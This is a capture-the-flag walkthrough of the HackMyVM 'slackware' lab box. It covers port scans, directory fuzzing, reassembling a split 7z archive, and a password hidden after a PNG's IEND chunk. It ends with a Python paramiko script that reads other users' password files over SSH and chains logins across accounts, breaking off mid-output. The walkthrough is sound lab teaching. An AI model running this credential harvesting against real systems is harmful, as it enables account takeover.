HackMyVM-slackware

This post was last updated on the evening of 12 November 2024

Master cx was far too productive today; I feel inadequate by comparison, sob (

Discovering live hosts

┌──(root㉿kali)-[/home/kali/baji/slackware]
└─# nmap -Pn -n 192.168.56.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 01:10 EST
Nmap scan report for 192.168.56.1
Host is up (0.00044s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2179/tcp open vmrdp
MAC Address: 0A:00:27:00:00:08 (Unknown)

Nmap scan report for 192.168.56.2
Host is up (0.00040s latency).
All 1000 scanned ports on 192.168.56.2 are in ignored states.
Not shown: 1000 filtered tcp ports (proto-unreach)
MAC Address: 08:00:27:34:14:9C (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.56.16
Host is up (0.00091s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
1/tcp open tcpmux
MAC Address: 08:00:27:18:04:1D (Oracle VirtualBox virtual NIC)

Nmap scan report for 192.168.56.4
Host is up (0.0000070s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh

Nmap done: 256 IP addresses (4 hosts up) scanned in 3.01 seconds

Target host: 192.168.56.16

Enumerating the target's services

┌──(root㉿kali)-[/home/kali/baji/slackware]
└─# nmap -Pn -n -sV -sC 192.168.56.16 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-12 01:10 EST
Nmap scan report for 192.168.56.16
Host is up (0.00074s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
1/tcp open ssh OpenSSH 9.3 (protocol 2.0)
| ssh-hostkey:
| 256 e2:66:60:79:bc:d1:33:2e:c1:25:fa:99:e5:89:1e:d3 (ECDSA)
|_ 256 98:59:c3:a8:2b:89:56:77:eb:72:4a:05:90:21:cb:40 (ED25519)
2/tcp open http Apache httpd 2.4.58 ((Unix))
|_http-title: Tribute to Slackware
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.58 (Unix)
MAC Address: 08:00:27:18:04:1D (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.39 seconds

A bit unusual this time, haha: port 1 is SSH and port 2 is HTTP.

Information gathering on the target's services

2-http

This can be found on Google: slackware. At the very bottom of the Security Advisories section there is a leaked ssh key.

Download it to Kali

┌──(root㉿kali)-[/home/kali/baji/slackware]
└─# curl https://www.slackware.com/infra/keys/GPG-KEY > key
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1572 100 1572 0 0 700 0 0:00:02 0:00:02 --:--:-- 700

Keep it for later; continue with information gathering.

┌──(root㉿kali)-[/home/kali/baji/slackware]
└─# gobuster dir -u http://192.168.56.16:2 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.16:2
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,zip,bak,jpg,txt,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 199]
/index.html (Status: 200) [Size: 7511]
/background.jpg (Status: 200) [Size: 13798]
/robots.txt (Status: 200) [Size: 21]
/.html (Status: 403) [Size: 199]
/getslack (Status: 301) [Size: 240] [--> http://192.168.56.16:2/getslack/]

Found a robots.txt. Let's look at it.

It contains a 7z.001?

That is one volume of a split 7z archive, which means there are more volumes like it, differing only in the .00? suffix.

But first I need to find out how to download the volumes.

Let's look at /getslack.

It hints to search here????

(Before this I had inspected the metadata of the image the scan found, and kept scanning for 7z-related names and files under /getslack. All of that can yield useful information on other boxes; it just isn't needed for this one. I encourage you to try it.)
What does the hint mean? (Reading around, I found that the volumes of a split archive all share a prefix, so I decided to fuzz for it.)

┌──(root㉿kali)-[/home/kali/baji/slackware]
└─# wfuzz -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -u http://192.168.56.16:2/getslack/FUZZ.7z.001 --sc 200
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.56.16:2/getslack/FUZZ.7z.001
Total requests: 207643

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000001: 200 1 L 2 W 12 Ch "# directory-list-lowercase-2.3-medium.txt"
000000007: 200 1 L 2 W 12 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000000003: 200 1 L 2 W 12 Ch "# Copyright 2007 James Fisher"
000000012: 200 1 L 2 W 12 Ch "# on atleast 2 different hosts"
000000009: 200 1 L 2 W 12 Ch "# Suite 300, San Francisco, California, 94105, USA."
000000010: 200 1 L 2 W 12 Ch "#"
000000011: 200 1 L 2 W 12 Ch "# Priority ordered case insensative list, where entries were found"
000000013: 200 1 L 2 W 12 Ch "#"
000000006: 200 1 L 2 W 12 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this"
000000008: 200 1 L 2 W 12 Ch "# or send a letter to Creative Commons, 171 Second Street,"
000000005: 200 1 L 2 W 12 Ch "# This work is licensed under the Creative Commons"
000000002: 200 1 L 2 W 12 Ch "#"
000000004: 200 1 L 2 W 12 Ch "#"
000049387: 200 80 L 794 W 19474 Ch "twitter"

The fuzzed prefix is twitter. Download it locally and take a look.

┌──(root㉿kali)-[/home/kali/baji/slackware]
└─# wget http://192.168.56.16:2/getslack/twitter.7z.001
--2024-11-12 01:28:00-- http://192.168.56.16:2/getslack/twitter.7z.001
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-7z-compressed]
Saving to: ‘twitter.7z.001’

twitter.7z.001 100%[=============================================================================================================>] 20.00K --.-KB/s in 0.001s

2024-11-12 01:28:00 (26.9 MB/s) - ‘twitter.7z.001’ saved [20480/20480]

As mentioned, this is just one volume of the 7z archive, so there must be many more. Use a loop to download them.

┌──(root㉿kali)-[/home/kali/baji/slackware]
└─# for i in $(seq 1 20); do wget http://192.168.56.16:2/getslack/twitter.7z.0$i; done
--2024-11-12 01:29:31-- http://192.168.56.16:2/getslack/twitter.7z.01
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:31 ERROR 404: Not Found.

--2024-11-12 01:29:31-- http://192.168.56.16:2/getslack/twitter.7z.02
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:31 ERROR 404: Not Found.

--2024-11-12 01:29:31-- http://192.168.56.16:2/getslack/twitter.7z.03
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:31 ERROR 404: Not Found.

--2024-11-12 01:29:31-- http://192.168.56.16:2/getslack/twitter.7z.04
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:31 ERROR 404: Not Found.

--2024-11-12 01:29:31-- http://192.168.56.16:2/getslack/twitter.7z.05
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:31 ERROR 404: Not Found.

--2024-11-12 01:29:31-- http://192.168.56.16:2/getslack/twitter.7z.06
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:31 ERROR 404: Not Found.

--2024-11-12 01:29:31-- http://192.168.56.16:2/getslack/twitter.7z.07
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:31 ERROR 404: Not Found.

--2024-11-12 01:29:31-- http://192.168.56.16:2/getslack/twitter.7z.08
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:31 ERROR 404: Not Found.

--2024-11-12 01:29:31-- http://192.168.56.16:2/getslack/twitter.7z.09
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:31 ERROR 404: Not Found.

--2024-11-12 01:29:31-- http://192.168.56.16:2/getslack/twitter.7z.010
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-7z-compressed]
Saving to: ‘twitter.7z.010’

twitter.7z.010 100%[=============================================================================================================>] 20.00K --.-KB/s in 0.001s

2024-11-12 01:29:31 (16.1 MB/s) - ‘twitter.7z.010’ saved [20480/20480]

--2024-11-12 01:29:31-- http://192.168.56.16:2/getslack/twitter.7z.011
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-7z-compressed]
Saving to: ‘twitter.7z.011’

twitter.7z.011 100%[=============================================================================================================>] 20.00K --.-KB/s in 0.001s

2024-11-12 01:29:31 (18.0 MB/s) - ‘twitter.7z.011’ saved [20480/20480]

--2024-11-12 01:29:31-- http://192.168.56.16:2/getslack/twitter.7z.012
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-7z-compressed]
Saving to: ‘twitter.7z.012’

twitter.7z.012 100%[=============================================================================================================>] 20.00K --.-KB/s in 0s

2024-11-12 01:29:31 (54.4 MB/s) - ‘twitter.7z.012’ saved [20480/20480]

--2024-11-12 01:29:31-- http://192.168.56.16:2/getslack/twitter.7z.013
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-7z-compressed]
Saving to: ‘twitter.7z.013’

twitter.7z.013 100%[=============================================================================================================>] 20.00K --.-KB/s in 0.003s

2024-11-12 01:29:31 (7.05 MB/s) - ‘twitter.7z.013’ saved [20480/20480]

--2024-11-12 01:29:31-- http://192.168.56.16:2/getslack/twitter.7z.014
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1860 (1.8K) [application/x-7z-compressed]
Saving to: ‘twitter.7z.014’

twitter.7z.014 100%[=============================================================================================================>] 1.82K --.-KB/s in 0s

2024-11-12 01:29:31 (89.5 MB/s) - ‘twitter.7z.014’ saved [1860/1860]

--2024-11-12 01:29:31-- http://192.168.56.16:2/getslack/twitter.7z.015
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:31 ERROR 404: Not Found.

--2024-11-12 01:29:31-- http://192.168.56.16:2/getslack/twitter.7z.016
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:31 ERROR 404: Not Found.

--2024-11-12 01:29:31-- http://192.168.56.16:2/getslack/twitter.7z.017
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:31 ERROR 404: Not Found.

--2024-11-12 01:29:31-- http://192.168.56.16:2/getslack/twitter.7z.018
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:31 ERROR 404: Not Found.

--2024-11-12 01:29:31-- http://192.168.56.16:2/getslack/twitter.7z.019
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:31 ERROR 404: Not Found.

--2024-11-12 01:29:31-- http://192.168.56.16:2/getslack/twitter.7z.020
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:31 ERROR 404: Not Found.


┌──(root㉿kali)-[/home/kali/baji/slackware]
└─# for i in $(seq 1 20); do wget http://192.168.56.16:2/getslack/twitter.7z.00$i; done
--2024-11-12 01:29:35-- http://192.168.56.16:2/getslack/twitter.7z.001
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-7z-compressed]
Saving to: ‘twitter.7z.001.1’

twitter.7z.001.1 100%[=============================================================================================================>] 20.00K --.-KB/s in 0.002s

2024-11-12 01:29:35 (10.3 MB/s) - ‘twitter.7z.001.1’ saved [20480/20480]

--2024-11-12 01:29:35-- http://192.168.56.16:2/getslack/twitter.7z.002
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-7z-compressed]
Saving to: ‘twitter.7z.002’

twitter.7z.002 100%[=============================================================================================================>] 20.00K --.-KB/s in 0.002s

2024-11-12 01:29:35 (11.5 MB/s) - ‘twitter.7z.002’ saved [20480/20480]

--2024-11-12 01:29:35-- http://192.168.56.16:2/getslack/twitter.7z.003
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-7z-compressed]
Saving to: ‘twitter.7z.003’

twitter.7z.003 100%[=============================================================================================================>] 20.00K --.-KB/s in 0.001s

2024-11-12 01:29:35 (13.1 MB/s) - ‘twitter.7z.003’ saved [20480/20480]

--2024-11-12 01:29:35-- http://192.168.56.16:2/getslack/twitter.7z.004
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-7z-compressed]
Saving to: ‘twitter.7z.004’

twitter.7z.004 100%[=============================================================================================================>] 20.00K --.-KB/s in 0s

2024-11-12 01:29:35 (400 MB/s) - ‘twitter.7z.004’ saved [20480/20480]

--2024-11-12 01:29:35-- http://192.168.56.16:2/getslack/twitter.7z.005
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-7z-compressed]
Saving to: ‘twitter.7z.005’

twitter.7z.005 100%[=============================================================================================================>] 20.00K --.-KB/s in 0.001s

2024-11-12 01:29:35 (16.1 MB/s) - ‘twitter.7z.005’ saved [20480/20480]

--2024-11-12 01:29:35-- http://192.168.56.16:2/getslack/twitter.7z.006
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-7z-compressed]
Saving to: ‘twitter.7z.006’

twitter.7z.006 100%[=============================================================================================================>] 20.00K --.-KB/s in 0.001s

2024-11-12 01:29:35 (17.3 MB/s) - ‘twitter.7z.006’ saved [20480/20480]

--2024-11-12 01:29:35-- http://192.168.56.16:2/getslack/twitter.7z.007
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-7z-compressed]
Saving to: ‘twitter.7z.007’

twitter.7z.007 100%[=============================================================================================================>] 20.00K --.-KB/s in 0.001s

2024-11-12 01:29:35 (17.3 MB/s) - ‘twitter.7z.007’ saved [20480/20480]

--2024-11-12 01:29:35-- http://192.168.56.16:2/getslack/twitter.7z.008
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-7z-compressed]
Saving to: ‘twitter.7z.008’

twitter.7z.008 100%[=============================================================================================================>] 20.00K --.-KB/s in 0.001s

2024-11-12 01:29:35 (20.4 MB/s) - ‘twitter.7z.008’ saved [20480/20480]

--2024-11-12 01:29:35-- http://192.168.56.16:2/getslack/twitter.7z.009
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20480 (20K) [application/x-7z-compressed]
Saving to: ‘twitter.7z.009’

twitter.7z.009 100%[=============================================================================================================>] 20.00K --.-KB/s in 0s

2024-11-12 01:29:35 (87.7 MB/s) - ‘twitter.7z.009’ saved [20480/20480]

--2024-11-12 01:29:35-- http://192.168.56.16:2/getslack/twitter.7z.0010
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:35 ERROR 404: Not Found.

--2024-11-12 01:29:35-- http://192.168.56.16:2/getslack/twitter.7z.0011
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:35 ERROR 404: Not Found.

--2024-11-12 01:29:35-- http://192.168.56.16:2/getslack/twitter.7z.0012
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:35 ERROR 404: Not Found.

--2024-11-12 01:29:35-- http://192.168.56.16:2/getslack/twitter.7z.0013
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:35 ERROR 404: Not Found.

--2024-11-12 01:29:35-- http://192.168.56.16:2/getslack/twitter.7z.0014
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:35 ERROR 404: Not Found.

--2024-11-12 01:29:35-- http://192.168.56.16:2/getslack/twitter.7z.0015
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:35 ERROR 404: Not Found.

--2024-11-12 01:29:35-- http://192.168.56.16:2/getslack/twitter.7z.0016
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:35 ERROR 404: Not Found.

--2024-11-12 01:29:35-- http://192.168.56.16:2/getslack/twitter.7z.0017
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:35 ERROR 404: Not Found.

--2024-11-12 01:29:35-- http://192.168.56.16:2/getslack/twitter.7z.0018
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:35 ERROR 404: Not Found.

--2024-11-12 01:29:35-- http://192.168.56.16:2/getslack/twitter.7z.0019
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:35 ERROR 404: Not Found.

--2024-11-12 01:29:35-- http://192.168.56.16:2/getslack/twitter.7z.0020
Connecting to 192.168.56.16:2... connected.
HTTP request sent, awaiting response... 404 Not Found
2024-11-12 01:29:35 ERROR 404: Not Found.

All volumes are downloaded; now extract.

┌──(root㉿kali)-[/home/kali/baji/slackware]
└─# 7z x twitter.7z.001

7-Zip 24.07 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-06-19
64-bit locale=en_US.UTF-8 Threads:2 OPEN_MAX:1024

Scanning the drive for archives:
1 file, 20480 bytes (20 KiB)

Extracting archive: twitter.7z.001
--
Path = twitter.7z.001
Type = Split
Physical Size = 20480
Volumes = 14
Total Physical Size = 268100
----
Path = twitter.7z
Size = 268100
--
Path = twitter.7z
Type = 7z
Physical Size = 268100
Headers Size = 130
Method = LZMA2:384k
Solid = -
Blocks = 1

Everything is Ok

Size: 267951
Compressed: 268100

The x option automatically picks up the remaining volumes of the split archive.
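The two wget loops above stumbled over 7-Zip's zero-padded volume numbering (.001 through .014): the first loop asked for .01 to .09 and the second for .0010 onward, so each half of the set had to be fetched separately. As an added example that is not part of the original write-up, the Python script below generates the names correctly, stops at the first missing volume, and reproduces the two figures 7z printed (Volumes = 14, Total Physical Size = 268100) against a constructed stand-in for the web server whose per-volume sizes are the ones the wget output reported. The base URL and prefix are the page's; `simulated_fetch`, `fetch_volumes`, `summarize` and `demo` are my names and assumptions, not any tool's API.

```python
"""Fetch the volumes of a split 7z archive (prefix.7z.001, .002, ...) with
correct zero padding, stop at the first missing volume, and sanity-check the
set the way `7z x` reports it. Added example; not the write-up's own code."""
from typing import Callable, List, Optional, Tuple
import urllib.error
import urllib.request

Fetcher = Callable[[str], Optional[bytes]]


def volume_name(prefix: str, n: int, width: int = 3) -> str:
    """7-Zip numbers split volumes with a fixed-width, zero-padded suffix."""
    return f"{prefix}.7z.{n:0{width}d}"


def http_fetch(url: str) -> Optional[bytes]:
    """Real fetcher: return the body, or None on 404 so the caller can stop."""
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.read()
    except urllib.error.HTTPError as exc:
        if exc.code == 404:
            return None
        raise


def fetch_volumes(base_url: str, prefix: str, fetch: Fetcher = http_fetch,
                  max_volumes: int = 999) -> List[Tuple[str, bytes]]:
    """Download volumes in order until one is missing. A split set is
    contiguous, so the first 404 marks the end of the archive."""
    volumes: List[Tuple[str, bytes]] = []
    for n in range(1, max_volumes + 1):
        name = volume_name(prefix, n)
        data = fetch(f"{base_url.rstrip('/')}/{name}")
        if data is None:
            break
        volumes.append((name, data))
    return volumes


def summarize(volumes: List[Tuple[str, bytes]]) -> dict:
    """Mirror what 7z prints for a split archive: volume count and total
    physical size. Every volume but the last must have the same size; a
    short volume in the middle means a download is missing or truncated."""
    sizes = [len(data) for _, data in volumes]
    full = sizes[0] if sizes else 0
    well_formed = bool(sizes) and all(s == full for s in sizes[:-1]) and sizes[-1] <= full
    return {"volumes": len(sizes), "total_physical_size": sum(sizes),
            "well_formed": well_formed}


# Constructed stand-in for the web server: 13 full 20480-byte volumes and a
# final 1860-byte one (the sizes wget reported above); anything else is a 404.
_SIMULATED_SIZES = {n: 20480 for n in range(1, 14)}
_SIMULATED_SIZES[14] = 1860


def simulated_fetch(url: str) -> Optional[bytes]:
    """Fake fetcher: only exact three-digit suffixes 001..014 exist."""
    suffix = url.rsplit(".", 1)[-1]
    if not (suffix.isdigit() and len(suffix) == 3):
        return None
    size = _SIMULATED_SIZES.get(int(suffix))
    return None if size is None else b"\x00" * size


def demo(base_url: str = "http://192.168.56.16:2/getslack",
         prefix: str = "twitter") -> dict:
    """Run the enumeration against the simulated server and summarise it."""
    return summarize(fetch_volumes(base_url, prefix, fetch=simulated_fetch))


if __name__ == "__main__":
    # Swap fetch=http_fetch to hit a real server, then write each (name, data)
    # pair to disk before running `7z x prefix.7z.001`.
    print(demo())
```

The `well_formed` check is the part worth keeping: when `7z x` complains about a volume, comparing sizes is the fastest way to tell a truncated download from a genuinely missing one.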

┌──(root㉿kali)-[/home/kali/baji/slackware]
└─# exiftool twitter.png
ExifTool Version Number : 12.76
File Name : twitter.png
Directory : .
File Size : 268 kB
File Modification Date/Time : 2024:03:10 16:42:47-04:00
File Access Date/Time : 2024:11:12 01:30:12-05:00
File Inode Change Date/Time : 2024:11:12 01:30:12-05:00
File Permissions : -rw-r--r--
File Type : PNG
File Type Extension : png
MIME Type : image/png
Image Width : 400
Image Height : 400
Bit Depth : 8
Color Type : RGB
Compression : Deflate/Inflate
Filter : Adaptive
Interlace : Noninterlaced
Profile Name : icc
Profile CMM Type : Little CMS
Profile Version : 4.4.0
Profile Class : Display Device Profile
Color Space Data : RGB
Profile Connection Space : XYZ
Profile Date Time : 2022:12:19 06:28:40
Profile File Signature : acsp
Primary Platform : Apple Computer Inc.
CMM Flags : Not Embedded, Independent
Device Manufacturer :
Device Model :
Device Attributes : Reflective, Glossy, Positive, Color
Rendering Intent : Perceptual
Connection Space Illuminant : 0.9642 1 0.82491
Profile Creator : Little CMS
Profile ID : 0
Profile Description : GIMP built-in sRGB
Profile Copyright : Public Domain
Media White Point : 0.9642 1 0.82491
Chromatic Adaptation : 1.04788 0.02292 -0.05022 0.02959 0.99048 -0.01707 -0.00925 0.01508 0.75168
Red Matrix Column : 0.43604 0.22249 0.01392
Blue Matrix Column : 0.14305 0.06061 0.71393
Green Matrix Column : 0.38512 0.7169 0.09706
Red Tone Reproduction Curve : (Binary data 32 bytes, use -b option to extract)
Green Tone Reproduction Curve : (Binary data 32 bytes, use -b option to extract)
Blue Tone Reproduction Curve : (Binary data 32 bytes, use -b option to extract)
Chromaticity Channels : 3
Chromaticity Colorant : Unknown
Chromaticity Channel 1 : 0.64 0.33002
Chromaticity Channel 2 : 0.3 0.60001
Chromaticity Channel 3 : 0.15001 0.06
Device Mfg Desc : GIMP
Device Model Desc : sRGB
White Point X : 0.3127
White Point Y : 0.329
Red X : 0.64
Red Y : 0.33
Green X : 0.3
Green Y : 0.6
Blue X : 0.15
Blue Y : 0.06
Warning : [minor] Trailer data after PNG IEND chunk
Image Size : 400x400
Megapixels : 0.160

Inspecting the image with exiftool shows nothing useful in the metadata itself (note, though, the warning about trailer data after the PNG IEND chunk).
Let's look at the binary content.

It looks like a password. This is where a headless terminal falls short, qwq. Let's open the image on the Kali desktop and see what it looks like.
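The exiftool warning "Trailer data after PNG IEND chunk" is exactly the clue here: a PNG ends at its IEND chunk, and any bytes after it are ignored by viewers but still sit in the file. As an added example that is not part of the original write-up, the Python script below walks the chunk structure, verifies each chunk's CRC, returns whatever follows IEND, and lists the printable runs in it the way `strings` would. It builds its own minimal 1x1 PNG with a constructed trailer so it runs offline; `build_sample_png`, `png_trailer` and `printable_runs` are my names, not from any library.

```python
"""Walk a PNG's chunks and report data appended after IEND, the condition
exiftool flags as 'Trailer data after PNG IEND chunk'. Added example; not
the write-up's own code."""
import re
import struct
import zlib
from typing import List

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype: bytes, payload: bytes) -> bytes:
    """Serialise one chunk: 4-byte length, type, payload, CRC32 over type+payload."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def build_sample_png(trailer: bytes = b"") -> bytes:
    """Constructed 1x1 RGB PNG with optional bytes appended after IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # 1x1, 8-bit, RGB
    idat = zlib.compress(b"\x00\xff\x00\x00")              # filter 0 + one red pixel
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat)
            + _chunk(b"IEND", b"") + trailer)


def png_trailer(data: bytes) -> dict:
    """Parse chunks up to IEND. Returns the chunk types seen, the types whose
    CRC did not verify, and every byte that follows the IEND chunk."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    chunks: List[str] = []
    bad_crc: List[str] = []
    while True:
        if pos + 12 > len(data):
            raise ValueError("truncated: ran out of data before IEND")
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        ctype = data[pos + 4:pos + 8]
        end = pos + 12 + length
        if end > len(data):
            raise ValueError(f"truncated chunk {ctype!r}")
        payload = data[pos + 8:pos + 8 + length]
        (stored,) = struct.unpack(">I", data[pos + 8 + length:end])
        if zlib.crc32(ctype + payload) & 0xFFFFFFFF != stored:
            bad_crc.append(ctype.decode("latin-1"))
        chunks.append(ctype.decode("latin-1"))
        pos = end
        if ctype == b"IEND":
            break
    return {"chunks": chunks, "bad_crc": bad_crc, "trailer": data[pos:]}


def printable_runs(data: bytes, min_len: int = 4) -> List[str]:
    """Printable ASCII runs, like `strings`, for a first look at trailer bytes."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        blob = open(sys.argv[1], "rb").read()
    else:  # constructed sample with a made-up trailer
        blob = build_sample_png(b"\x00\x00constructed-trailer-text\x00")
    result = png_trailer(blob)
    print("chunks:", result["chunks"], "bad CRC:", result["bad_crc"])
    print("trailer bytes:", len(result["trailer"]),
          "printable:", printable_runs(result["trailer"]))
```

Run it as `python3 png_trailer.py twitter.png` to get the trailer without opening a hex dump; a non-empty trailer or a CRC failure on a file that otherwise renders fine is the signal worth chasing.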

This is the social-engineering part... straight to Google reverse image search.

We get a Twitter name; let's try whether it can log in.

Patrick Volkerding

The full name cannot log in, so I tried just the first part, and that works. The password is the one from the image's binary content: trYth1sPasS1993

This is really the ultimate nesting doll. Users in the same group can read each other's passwords (stored in mypass.txt in each user's home directory), but some users in a group also belong to other groups. So you have to grab another same-group user's password, switch to that user, grab the next one, and keep going until you find user_flag.

I did it by hand, switching through somewhere between ten-odd and twenty-odd users, I forget. user_flag is under rpj7. Here I borrow a script from a more experienced player.

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/9/11 12:49
# @Author : hgbe02
# @File : slakeware_brute.py

import paramiko

usernames = []
passwords = []

def ssh_login_with_password(host, port, username, password):
    global usernames, passwords
    # Create a new SSH client object
    client = paramiko.SSHClient()
    # Auto-add policy: the server's host key is accepted and stored automatically
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    try:
        # Connect to the SSH server, authenticating with a password
        client.connect(host, port=port, username=username, password=password)

        # Run a command to collect usernames: the owner of every readable *pass* file
        # (the glob is quoted so the remote shell hands it to find unexpanded)
        stdin, stdout, stderr = client.exec_command(
            "find ../ -name '*pass*' -type f 2>/dev/null | awk -F '[/]' '{print $2}'"
        )
        output = stdout.read().decode().splitlines()
        # print("[+] Username\n", output)
        for line in output:
            stripped_line = line.strip()
            if stripped_line not in usernames:
                usernames.append(stripped_line)

        # Run a command to collect the passwords from the same files
        # (index i of passwords belongs to index i of usernames, which assumes
        # no two users share a password)
        stdin, stdout, stderr = client.exec_command(
            "find ../ -name '*pass*' -type f 2>/dev/null | xargs cat"
        )
        output = stdout.read().decode().splitlines()
        # print("[+] Password\n", output)
        for line in output:
            stripped_line = line.strip()
            if stripped_line not in passwords:
                passwords.append(stripped_line)

    except paramiko.AuthenticationException:
        print("Authentication failed, please verify your credentials.")
    except paramiko.SSHException as sshException:
        print("Unable to establish SSH connection: " + str(sshException))
    except Exception as e:
        print("Exception in connecting to the server: " + str(e))
    finally:
        # Close the connection
        client.close()

ssh_login_with_password('192.168.10.100', 1, 'patrick', 'trYth1sPasS1993')

# Log in as each newly discovered user in turn; every login can extend the
# lists, so the loop ends only when every reachable user has been visited
a = 0
while a < len(usernames):
    ssh_login_with_password('192.168.10.100', 1, usernames[a], passwords[a])
    a += 1

print('[+] username and password ! (✪ω✪)')
print(usernames)
print(passwords)

# ['claor', 'kretinga', 'mrmidnight', 'alienum', 'powerful', 'annlynn', 'proxy', 'x4v1l0k', 'icex64', 'mindsflee',
